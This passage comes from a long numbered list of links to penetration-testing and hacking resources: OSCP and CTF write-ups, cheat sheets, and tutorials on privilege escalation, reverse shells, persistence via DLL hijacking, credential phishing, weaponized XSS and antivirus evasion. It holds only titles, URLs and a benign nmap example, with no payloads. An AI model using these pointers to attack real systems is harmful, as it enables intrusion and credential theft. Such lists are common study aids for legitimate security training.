Active Directory.\n\n\nhttps://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound \n\n\n\n-1907-Advanced Hacking Tutorials Collection:\n\n\nhttps://yeahhub.com/advanced-hacking-tutorials-collection\n\n\n\n-1908-Persistence – DLL Hijacking:\n\n\nhttps://pentestlab.blog/2020/03/04/persistence-dll-hijacking\n\n\n\n-1909-Brute force and dictionary attacks: A cheat sheet:\n\n\nhttps://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet\n\n\n\n\n\n\n-1910-How to use Facebook for Open Source Investigation:\n\n\nhttps://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint\n\n\n-1911-tcpdump Cheat Sheet:\n\n\nhttps://comparitech.com/net-admin/tcpdump-cheat-sheet\n\n\n\n-1912-Windows Post exploitation recon with Metasploit:\n\n\nhttps://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit\n\n\n\n-1913-Bug Hunting Methodology:\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066\n\n\n-1914-Malware traffic analysis tutorial:\n\n\nhttps://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html\n\n\n\n-1915-Recon-ng v5 Tutorial:\n\n\nhttps://geekwire.eu/recon-ng-v5-tutorial\n\n\n\n-1916-Windows and Linux Privilege Escalation Tools:\n\n\nhttps://yeahhub.com/windows-linux-privilege-escalation-tools-2019\n\n\n\n-1917-Total OSCP Guide:\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide\n\n\n-1918-Phishing Windows Credentials:\n\n\nhttps://pentestlab.blog/2020/03/02/phishing-windows-credentials\n\n\n-1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials:\n\n\nhttps://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials\n\n\n\n-1920-Recent Papers Related To Fuzzing:\n\n\nhttps://wcventure.github.io/FuzzingPaper\n\n\n\n\n-1921-Web Shells 101 Using PHP (Web Shells Part 2):\n\n\nhttps://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\n\n\n\n-1922-Python3 reverse shell:\n\n\n\nhttps://polisediltrading.it/hai6jzbs/python3-reverse-shell.html\n\n\n\n-1923-Reverse Shell between two Linux machines:\n\n\n\nhttps://yeahhub.com/reverse-shell-linux-machines\n\n\n\n-1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit):\n\n\n\nhttps://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html\n\n\n\n\n-1925-How to Use Wireshark: Comprehensive Tutorial + Tips:\n\n\n\nhttps://varonis.com/blog/how-to-use-wireshark\n\n\n\n-1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation?\n\n\n\nhttps://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts\n\n\n\n-1927-Ethical hacking:Top privilege escalation techniques in Windows:\n\n\nhttps://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows\n\n\n\n-1928-How to Identify Company's Hacked Email Addresses:\n\n\n\nhttps://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html\n\n\n\n-1929-Android APK Reverse Engineering: What's in an APK:\n\n\n\nhttps://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk\n\n\n\n\n\n-1930-Keep Calm and HackTheBox - Beep:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/\n\n\n-1931-Keep Calm and HackTheBox -Legacy:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/\n\n\n\n-1932-Keep Calm and HackTheBox -Lame:\n\n\nhttps://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/\n\n\n\n\n-1933-HacktheBox:Writeup Walkthrough:\n\n\nhttps://hackingarticles.in/hack-the-box-writeup-walkthrough\n\n\n\n-1934-2020 OSCP Exam Preparation:\n\n\n\nhttps://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp\n\n\n\n-1935-My OSCP transformation:\n\n\nhttps://kevsec.fr/journey-to-oscp-2019-write-up\n\n\n\n-1936-A Detailed Guide on OSCP Preparation:\n\n\n\nhttps://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/\n\n\n\n-1937-Useful Commands and Tools - #OSCP:\n\n\nhttps://yeahhub.com/useful-commands-tools-oscp/\n\n\n-1938-Comprehensive Guide on Password Spraying Attack\n\n\nhttps://hackingarticles.in/comprehensive-guide-on-password-spraying-attack\n\n\n-1939-Privilege Escalation:\n\n\nhttps://pentestlab.blog/category/privilege-escalation/\n\n\n-1940-Red Team:\n\n\nhttps://pentestlab.blog/category/red-team/\n\n\n\n-1941-Linux post-exploitation.Advancing from user to super-user in a few clicks\n\n\n\nhttps://hackmag.com/security/linux-killchain/\n\n\n\n-1942--#BugBounty Cheatsheet\n\n\nhttps://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html\n\n\n-1943--#Windows Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html\n\n\n-1944-#Linux Notes/Cheatsheet\n\n\nhttps://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html\n\n\n-1945-Windows Notes\n\n\nhttps://mad-coding.cn/tags/Windows/\n\n\n-1946-#BlueTeam CheatSheet\n\n\nhttps://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d\n\n\n-1947-Linux Privilege Escalation Cheatsheet for OSCP:\n\n\nhttps://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html\n\n\n\n-1948-Shodan Pentesting Guide:\n\n\nhttps://community.turgensec.com/shodan-pentesting-guide\n \n \n \n -1949-Pentesters Guide to PostgreSQL Hacking:\n \n \n https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007\n\n\n\n\n-1950-Hacking-OSCP cheatsheet:\n\n\nhttps://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/\n\n\n-1951-A Comprehensive Guide to Breaking SSH:\n\n\n\nhttps://community.turgensec.com/ssh-hacking-guide\n\n\n\n\n-1952-Windows Privilege Escalation Methods for Pentesters:\n\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n\n-1953-Best #firefox addons for #Hacking:\n\n\nhttps://twitter.com/cry__pto/status/1210836734331752449\n\n\n\n-1954-S3 Bucket Enumeration Tools:\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n-1955-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join:\n\n\n\nhttps://facebook.com/groups/AmmarAmerHacker\n\n\n\n-1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools:\n\n\nhttps://twitter.com/cry__pto/status/1270603017256124416\n\n\n\n-1958-S3 Bucket Enumeration Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269862357645307904\n\n\n\n-1959-Github Recon Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1269362041044832257\n\n\n\n\n-1960-Website Mirroring Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248640849812078593\n\n\n\n-1961-automated credential discovery tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1253214720372465665\n\n\n\n-1962-Antiforensics Techniques:\n\n\n\nhttps://twitter.com/cry__pto/status/1215001674760294400\n\n\n\n-1963-#bugbounty tools part (1):\n\n\nhttps://twitter.com/cry__pto/status/1212096231301881857\n\n\n\n1964-Binary Analysis Frameworks:\n\n\n\nhttps://twitter.com/cry__pto/status/1207966421575184384\n\n\n\n-1965-#BugBounty tools part (5):\n\n\n\nhttps://twitter.com/cry__pto/status/1214850754055458819\n\n\n\n-1966-#BugBounty tools part (3):\n\n\nhttps://twitter.com/cry__pto/status/1212290510922158080\n\n\n\n-1967-Kali Linux Commands List (Cheat Sheet):\n\n\n\nhttps://twitter.com/cry__pto/status/1264530546933272576\n\n\n\n-1968-#BugBounty tools part (4):\n\n\n\nhttps://twitter.com/cry__pto/status/1212296173412851712\n\n\n\n\n-1969--Automated enumeration tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1214919232389099521\n\n\n\n-1970-DNS lookup information Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1248639962746105863\n\n\n\n\n-1971-OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1972-Social Engineering Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1180731438796333056\n\n\n\n-1973-Hydra :\n\n\nhttps://twitter.com/cry__pto/status/1247507926807449600\n\n\n\n-1974-#OSINT Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1244433669936349184\n\n\n\n-1975-#BugBounty tools part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1212289852059860992\n\n\n\n-1976-my own ebook library:\n\n\n\nhttps://twitter.com/cry__pto/status/1239308541468516354\n\n\n\n\n-1977-Practice part (2):\n\n\n\nhttps://twitter.com/cry__pto/status/1213165695556567040\n\n\n\n-1978-Practice part (3):\n\n\n\nhttps://twitter.com/cry__pto/status/1214220715337097222\n\n\n\n\n-1979-my blog:\n\n\n\nhttps://twitter.com/cry__pto/status/1263457516672954368\n\n\n-1980-Practice:\n\n\n\nhttps://twitter.com/cry__pto/status/1212341774569504769\n\n\n\n-1981-how to search for XSS without proxy tool:\n\n\nhttps://twitter.com/cry__pto/status/1252558806837604352\n\n\n\n-1982-How to collect email addresses from search engines:\n\n\n\nhttps://twitter.com/cry__pto/status/1058864931792138240\n\n\n\n-1983-Hacking Tools Cheat Sheet:\n\n\n\nhttps://twitter.com/cry__pto/status/1255159507891687426\n\n\n-1984-#OSCP Your Full Guide:\n\n\n\nhttps://twitter.com/cry__pto/status/1240842587927445504\n\n\n\n-1985-#HackTheBox Your Full Guide:\n\n\nhttps://twitter.com/cry__pto/status/1241481478539816961\n\n\n\n\n-1986-Web Scanners:\n\n\n\nhttps://twitter.com/cry__pto/status/1271826773009928194\n\n\n-1987-HACKING MAGAZINES:\n\n-1-2600 — The Hacker Quarterly magazine:www.2600.com\n\n-2-Hackin9:http://hakin9.org\n\n-3-(IN)SECURE magazine:https://lnkd.in/grNM2t8\n\n-4-PHRACK:www.phrack.org/archives\n\n-5-Hacker’s Manual 2019\n\n\n-1988-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n\n-1989-Kali Linux Cheat Sheet for Hackers:\n\n\nhttps://twitter.com/cry__pto/status/1272792311236263937\n\n\n\n-1990-Web Exploitation Tools:\n\n\nhttps://twitter.com/cry__pto/status/1272778056952885249\n\n\n\n\n-1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP:\n\n\nhttps://twitter.com/cry__pto/status/1262089078339756032\n\n\n\n-1992-100 Best Hacking Tools for Security Professionals in 2020:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n\n-1993-SNMP Enumeration:\n\nOpUtils:www.manageengine.com\n\nSNMP Informant:www.snmp-informant.com\n\nSNMP Scanner:www.secure-bytes.com\n\nSNMPUtil:www.wtcs.org\n\nSolarWinds:www.solarwinds.com\n\n\n\n\n\n\n\n-1994-INFO-SEC RELATED CHEAT SHEETS:\n\n\nhttps://twitter.com/cry__pto/status/1274768435361337346\n\n\n\n-1995-METASPLOIT CHEAT SHEET:\n\n\nhttps://twitter.com/cry__pto/status/1274769179548278786\n\n\n\n\n-1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus:\n\n\nhttps://twitter.com/cry__pto/status/1275359087304286210\n\n\n-1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More:\n\n\n\nhttps://twitter.com/cry__pto/status/1276391703906222080\n\n\n\n-1998-learn penetration testing a great series as PDF:\n\n\nhttps://twitter.com/cry__pto/status/1277588369426526209\n\n\n-1999-Detecting secrets in code committed to Gitlab (in real time):\n\n\nhttps://www.youtube.com/watch?v=eCDgUvXZ_YE\n\n\n-2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants:\n\n\nhttps://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html\n\n\n\n-2001-Building Virtual Machine Labs:\n\n\nhttps://github.com/da667/Building_Virtual_Machine_Labs-Live_Training\n\n\n\n-2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]:\n\n\nhttps://kakyouim.hatenablog.com/entry/2020/05/27/010807 \n\n\n-2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools):\n\n\nhttps://softwaretestinghelp.com/penetration-testing-tools/ \n\n\n-2004-Full Connect Scan (-sT):\n\n-complete the three-way handshake\n\n-slower than SYN scan\n\n-no need for superuser Privileges\n\n-when stealth is not required\n\n-to know for sure which port is open\n\n-when running port scan via proxies like TOR\n\n-it can be detected\n\nnmap -sT -p 80 192.168.1.110\n\n\n-2005-today i learned that you can use strings command to extract email addresses from binary files:\n\n\nstrings -n 8 /usr/bin/who | grep '@'\n\n\n\n\n\n-2005-pentest cheat sheet :\n\n\nhttps://gist.github.com/githubfoam/4d3c99383b5372ee019c8fbc7581637d \n\n\n\n-2006-Tcpdump cheat sheet :\n\n\n\nhttps://gist.github.com/jforge/27962c52223ea9b8003b22b8189d93fb\n\n\n\n\n-2007-tcpdump - reading tcp flags :\n\n\n\nhttps://gist.github.com/tuxfight3r/9ac030cb0d707bb446c7\n\n\n-2008-CTF-Notes - Hackers Resources Galore:\n\n\nhttps://github.com/TheSecEng/CTF-notes\n\n\n-2009-Pentest-Cheat-Sheets:\n\n\nhttps://github.com/Kitsun3Sec/Pentest-Cheat-Sheets\n\n\n\n-2010--2-Web Application Cheatsheet (Vulnhub):\n\n\nhttps://github.com/Ignitetechnologies/Web-Application-Cheatsheet\n\n\n\n-2011-A cheatsheet with commands that can be used to perform kerberos attacks :\n\n\n\nhttps://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a\n\n\n-2012-Master Shodan Search Engine:\n\n\nhttps://rootkitpen.blogspot.com/2020/08/master-shodan-search-engine.html\n\n\n\n-2013-CTF Cheatsheet:\n\n\nhttps://github.com/uppusaikiran/awesome-ctf-cheatsheet\n\n\n-2014-Pentesting Cheatsheet:\n\n\nhttps://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5\n\n\n-2015-Hacking Cheatsheet:\n\n\nhttps://github.com/kobs0N/Hacking-Cheatsheet\n\n\n-2016-Hashcat-Cheatsheet:\n\n\nhttps://github.com/frizb/Hashcat-Cheatsheet\n\n\n-2017-Wireshark Cheat Sheet:\n\n\nhttps://github.com/security-cheatsheet/wireshark-cheatsheet\n\n\n\n-2018-JustTryHarder:\n\n\nhttps://github.com/sinfulz/JustTryHarder\n\n\n-2019-PWK-CheatSheet:\n\n\nhttps://github.com/ibr2/pwk-cheatsheet\n\n\n-2020-kali linux cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-2021-Hydra-Cheatsheet:\n\n\nhttps://github.com/frizb/Hydra-Cheatsheet\n\n\n-2022-Security Tools Cheatsheets:\n\n\n\nhttps://github.com/jayeshjodhawat\n\n\n\n-2023-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit:\n\n\nhttps://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/\n\n\n\n\n-2024-TRICKS FOR WEAPONIZING XSS:\n\n\n\nhttps://www.trustedsec.com/blog/tricks-for-weaponizing-xss/\n\n\n\n\n\n\n-2025-OSCP Notes:\n\n\n\n\nhttps://github.com/tbowman01/OSCP-PWK-Notes-Public\n\n\n\n\n-2026-OSCP Notes:\n\n\n\nhttps://github.com/Technowlogy-Pushpender/oscp-notes\n\n\n\n-2027-list of useful commands, shells and notes related to OSCP:\n\n\n\nhttps://github.com/s0wr0b1ndef/OSCP-note\n\n\n\n-2028-Notes for taking the OSCP in 2097:\n\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n\n-2029-My OSCP notes:\n\n\n\nhttps://github.com/tagnullde/OSCP\n\n\n\n-2030-Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor\n\n\nhttps://www.allysonomalley.com/2020/05/22/dnsobserver/\n\n\n\n\n-2031-Red Team Notes:\n\n\nhttps://dmcxblue.gitbook.io/red-team-notes/\n\n\n\n-2032-Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format:\n\n\nhttps://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls\n\n\n\n\n-2033-ESCALATING SUBDOMAIN TAKEOVERS TO STEAL COOKIES BY ABUSING DOCUMENT.DOMAIN:\n\n\nhttps://blog.takemyhand.xyz/2019/05/escalating-subdomain-takeovers-to-steal.html\n\n\n\n\n-2034-[SSTI] BREAKING GO'S TEMPLATE ENGINE TO GET XSS:\n\n\n\nhttps://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html\n\n\n\n\n\n-2035-Metasploitable 3:\n\n\n\n\nhttps://kakyouim.hatenablog.com/entry/2020/02/16/213616\n\n\n\n\n\n-2036-Reverse engineering and modifying an Android game:\n\n\nhttps://medium.com/swlh/reverse-engineering-and-modifying-an-android-game-apk-ctf-c617151b874c\n\n\n\n-2037-Reverse Engineering The Medium App (and making all stories in it free):\n\n\n\nhttps://medium.com/hackernoon/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687\n\n\n\n\n-2038-Android Apk Reverse Engineering:\n\n\n\nhttps://medium.com/@chris.yn.chen/apk-reverse-engineering-df7ed8cec191\n\n\n\n\n-2039-DIY Web App Pentesting Guide:\n\n\n\nhttps://medium.com/@luke_83192/diy-web-app-pentesting-guide-be54b303c6eb\n\n\n\n\n-2040-Local Admin Access and Group Policy Don’t Mix:\n\n\nhttps://www.trustedsec.com/blog/local-admin-access-and-group-policy-dont-mix/\n\n\n-2041-BREAKING TYPICAL WINDOWS HARDENING IMPLEMENTATIONS:\n\n\nhttps://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/\n\n\n\n\n\n-2042-Decrypting ADSync passwords - my journey into DPAPI:\n\n\n\nhttps://o365blog.com/post/adsync/\n\n\n\n\n\n-2043-Ultimate Guide: PostgreSQL Pentesting:\n\n\n\nhttps://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e\n\n\n\n\n\n-2044-SMB Enumeration for Penetration Testing:\n\n\nhttps://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b\n\n\n\n\n-2045-(Almost) All The Ways to File Transfer:\n\n\n\n\nhttps://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65\n\n\n\n-2046-HackTheBox TartarSauce Writeup:\n\n\nhttps://kakyouim.hatenablog.com/entry/2020/05/14/230445 \n\n\n\n\n-2047-Kerberos-Attacks-In-Depth:\n\n\nhttps://m0chan.github.io/Kerberos-Attacks-In-Depth\n\n\n\n-2048-From Recon to Bypassing MFA Implementation in OWA by Using EWS Misconfiguration:\n\n\nhttps://medium.com/bugbountywriteup/from-recon-to-bypassing-mfa-implementation-in-owa-by-using-ews-misconfiguration-b6a3518b0a63\n\n\n\n-2049-Writeups for infosec Capture the Flag events by team Galaxians:\n\n\nhttps://github.com/shiltemann/CTF-writeups-public \n\n\n-2050-Angstrom CTF 2018 — web challenges [writeup]:\n\n\nhttps://medium.com/bugbountywriteup/angstrom-ctf-2018-web-challenges-writeup-8a69998b0123 \n\n\n\n-2051-How to get started in CTF | Complete Begineer Guide:\n\n\nhttps://medium.com/bugbountywriteup/how-to-get-started-in-ctf-complete-begineer-guide-15ab5a6856d \n\n\n\n\n\n-2052-Hacking 101: An Ethical Hackers Guide for Getting from Beginner to Professional:\n\n\n\nhttps://medium.com/@gavinloughridge/hacking-101-an-ethical-hackers-guide-for-getting-from-beginner-to-professional-cd1fac182ff1 \n\n\n\n\n-2053-Reconnaissance the key to Ethical Hacking!:\n\n\nhttps://medium.com/techloop/reconnaissance-the-key-to-ethical-hacking-3b853510d977\n\n\n\n\n-2054-Day 18: Essential CTF Tools:\n\n\n\n\nhttps://medium.com/@int0x33/day-18-essential-ctf-tools-1f9af1552214 \n\n\n\n-2055-OSCP Cheatsheet:\n\n\nhttps://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e \n\n\n\n\n-2056-OSCP Cheat Sheet:\n\n\nhttps://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad\n\n\n\n\n-2057-TryHackMe: vulnversity:\n\n\nhttps://medium.com/@ratiros01/tryhackme-vulnversity-42074b8644df \n\n\n\n\n-2058-Malware Analysis Tools And Resources:\n\n\nhttps://medium.com/@NasreddineBencherchali/malware-analysis-tools-and-resources-16eb17666886 \n\n\n\n\n-2059-Extracting Embedded Payloads From Malware:\n\n\n\nhttps://medium.com/@ryancor/extracting-embedded-payloads-from-malware-aaca8e9aa1a9\n\n\n\n\n\n\n-2060-Attacks and Techniques Used Against WordPress Sites:\n\n\nhttps://www.trendmicro.com/en_us/research/19/l/looking-into-attacks-and-techniques-used-against-wordpress-sites.html\n\n\n\n\n\n-2061-Still Scanning IP Addresses? You’re Doing it Wrong:\n\n\n\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/still-scanning-ip-addresses-you-re-doing-it-wrong/ \n\n\n\n-2062-Source Code Disclosure via Exposed .git Folder:\n\n\nhttps://medium.com/dev-genius/source-code-disclosure-via-exposed-git-folder-24993c7561f1\n\n\n\n\n-2063-GitHub Recon - It’s Really Deep:\n\n\nhttps://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f\n\n\n\n-2064-From SSRF to Compromise: Case Study:\n\n\n\nhttps://trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-to-compromise-case-study/\n\n\n\n\n\n-2065-Bug Hunting with Param Miner: Cache poisoning with XSS, a peculiar case:\n\n\n\nhttps://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814 \n\n\n\n-2066-Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability:\n\n\nhttps://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/ \n\n\n\n-2067-Avoiding detection via dhcp options:\n\n\n\nhttps://sensepost.com/blog/2020/avoiding-detection-via-dhcp-options/\n\n\n\n\n\n-2068-Bug Bytes #86 - Stealing local files with Safari, Prototype pollution vs HTML sanitizers & A hacker’s mom learning bug bounty:\n\n\nhttps://blog.intigriti.com/2020/09/02/bug-bytes-86-stealing-local-files-with-safari-prototype-pollution-vs-html-sanitizers-a-hackers-mom-learning-bug-bounty/\n\n\n\n-2069-Bug Bytes #78 - BIG-IP RCE, Azure account takeover & Hunt scanner is back:\n\n\n\nhttps://blog.intigriti.com/2020/07/08/bug-bytes-78-big-ip-rce-azure-account-takeover-hunt-scanner-is-back/\n\n\n\n-2070-Hacking a Telecommunication company(MTN):\n\n\nhttps://medium.com/@afolicdaralee/hacking-a-telecommunication-company-mtn-c46696451fed\n\n\n\n\n-2071-$20000 Facebook DOM XSS:\n\n\nhttps://vinothkumar.me/20000-facebook-dom-xss/\n\n\n\n\n\n-2072-Backdooring WordPress with Phpsploit:\n\n\nhttps://blog.wpsec.com/backdooring-wordpress-with-phpsploit/\n\n\n\n\n\n-2073-Pro tips for bugbounty:\n\n\nhttps://medium.com/@chawdamrunal/pro-tips-for-bug-bounty-f9982a5fc5e9\n\n\n\n-2074-Collection Of #bugbountytips:\n\n\nhttps://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n\n\n\n-2075-Offensive Netcat/Ncat: From Port Scanning To Bind Shell IP Whitelisting:\n\n\n\nhttps://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da\n\n\n\n-2076-XSS for beginners:\n\n\nhttps://medium.com/swlh/xss-for-beginners-6752b1b1487d\n\n\n\n\n-2077-LET’S GO DEEP INTO OSINT: PART 1:\n\n\nmedium.com/bugbountywriteup/lets-go-deep-into-osint-part-1-c2de4fe4f3bf \n\n\n-2087-Beginner’s Guide to recon automation:\n\nmedium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb\n\n\n-2079-Automating Recon:\n\n\nhttps://medium.com/@amyrahm786/automating-recon-28b36dc2cf48\n\n\n\n-2080-XSS WAF & Character limitation bypass like a boss:\n\n\nhttps://medium.com/bugbountywriteup/xss-waf-character-limitation-bypass-like-a-boss-2c788647c229\n\n\n\n\n\n-2081-Chaining Improper Authorization To Race Condition To Harvest Credit Card Details : A Bug Bounty Story:\n\n\nhttps://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076\n\n\n\n\n-2082-TryHackMe Linux Challenges:\n\n\n\nhttps://secjuice.com/write-up-10-tryhackme-linux-challenges-part-1/ \n\n\n\n\n-2083-Persistence – COM Hijacking:\n\n\nhttps://pentestlab.blog/2020/05/20/persistence-com-hijacking/\n\n\n\n\n-2084-DLL Proxy Loading Your Favourite C# Implant\n\n\n\nhttps://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/\n\n\n\n-2085-how offensive actors use applescript for attacking macos:\n\n\n\nhttps://sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos\n\n\n\n-2086-Windows Privilege Escalation without Metasploit\n\n\nhttps://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666\n\n\n\n-2087-Privilege Escalation in Windows:\n\n\n\nhttps://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842\n\n\n\n\n-2088-OSWE Prep — Hack The Box Magic:\n\n\nhttps://medium.com/@ranakhalil101/oswe-prep-hack-the-box-magic-f173e2d09125\n\n\n\n-2089-Hackthebox | Bastion Writeup:\n\n\nhttps://medium.com/@_ncpd/hackthebox-bastion-writeup-9d6f6da3bcbb\n\n\n\n\n-2090-Hacking Android phone remotely using Metasploit:\n\n\n\nhttps://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8\n\n\n\n-2091-“Hacking with Metasploit” Tutorial:\n\n\n\nhttps://medium.com/cybersoton/hacking-with-metasploit-tutorial-7635b9d19e5\n\n\n\n\n-2092-Hack The Box — Tally Writeup w/o Metasploit:\n\n\n\nhttps://medium.com/@ranakhalil101/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3\n\n\n\n\n-2093-Burp Suite:\n\n\n\nhttps://medium.com/cyberdefendersprogram/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d\n\n\n\n-2094-h1–702 CTF — Web Challenge Write Up:\n\n\nhttps://medium.com/@amalmurali47/h1-702-ctf-web-challenge-write-up-53de31b2ddce\n\n\n\n-2095-SQL Injection & Remote Code Execution:\n\n\n\nhttps://medium.com/@shahjerry33/sql-injection-remote-code-execution-double-p1-6038ca88a2ec\n\n\n\n\n\n-2096-Juicy Infos hidden in js scripts leads to RCE :\n\n\n\nhttps://medium.com/@simobalghaoui/juicy-infos-hidden-in-js-scripts-lead-to-rce-5d4abbf24d9c\n\n\n\n-2097-Escalating Privileges like a Pro:\n\n\nhttps://gauravnarwani.com/escalating-privileges-like-a-pro/\n\n\n\n\n-2098-Top 16 Active Directory Vulnerabilities:\n\n\n\nhttps://www.infosecmatter.com/top-16-active-directory-vulnerabilities/\n\n\n\n\n-2099-Windows Red Team Cheat Sheet:\n\n\nhttps://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/\n\n\n-2100-OSCP: Developing a Methodology:\n\n\n\nhttps://medium.com/@falconspy/oscp-developing-a-methodology-32f4ab471fd6\n\n\n\n\n-2101-Zero to OSCP: Concise Edition:\n\n\nhttps://medium.com/@1chidan/zero-to-oscp-concise-edition-b5ecd4a781c3\n\n\n\n-2102-59 Hosts to Glory — Passing the OSCP:\n\n\nhttps://medium.com/@Tib3rius/59-hosts-to-glory-passing-the-oscp-acf0fd384371\n\n\n\n-2103-Can We Automate Bug Bounties With Wfuzz?\n\n\nmedium.com/better-programming/can-we-automate-earning-bug-bounties-with-wfuzz-c4e7a96810a5\n\n\n\n-2104-Advanced boolean-based SQLi filter bypass techniques:\n\n\nhttps://www.secjuice.com/advanced-sqli-waf-bypass/\n\n\n\n-2105-Beginners Guide On How You Can Use Javascript In BugBounty:\n\n\n\nhttps://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea\n\n\n\n\n\n-2106-OTP Bypass:\n\n\n\nmedium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89\n\n\n\n\n-2107-How we Hijacked 26+ Subdomains:\n\n\n\nhttps://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049\n\n\n\n\n\n-2018-How to spot and exploit postMessage vulnerablities:\n\n\n\nhttps://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc\n\n\n\n\n-2119-IDA Pro Tips to Add to Your Bag of Tricks:\n\n\nhttps://swarm.ptsecurity.com/ida-pro-tips/\n\n\n-2120-N1QL 